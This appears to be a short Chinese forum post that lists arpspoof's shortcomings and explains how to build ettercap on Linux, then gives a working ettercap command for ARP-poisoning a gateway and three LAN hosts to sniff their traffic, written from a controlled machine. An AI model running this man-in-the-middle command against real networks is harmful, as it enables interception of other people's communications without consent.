arpspoof真是老掉牙了,有以下三个缺点:
1。不支持双向欺骗,要实现,只能启动两个进程。
2。不支持多个ip,要不就是整个网段(除非也启动多个进程)
3。不支持mac地址伪造。
还是用ettercap吧,这个东西,介绍的资料都是windows下面的多。
我的被控端是linux下呀,而目标是windows。没有办法,硬着头皮装吧:
1..libnet-1.1.2.1.tar.gz
2.libpcap-1.0.0.tar.gz
3.ettercap-NG-0.7.3.tar.gz
4.更新gtk2:yuminstallcurl-develgtk2-develboost-devel
(不然报错Packagerequirements(gtk+-2.0>=2.0.0pango>=1.0atk>=1.)
============以上几个包,因为装arpspoof要求低版本的,现在害的我装这个,又得全升级。
具体安装反正就是./configure,make,makeinstall就不多说了。
使用:
ettercap-C(出来一个界面可以配置)
/usr/local/bin/ettercap-T-Marp:remote/192.168.219.1//192.168.219.17,26,35/
这个就是arp模式嗅探17,26,35与网关1之间的数据。
*
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡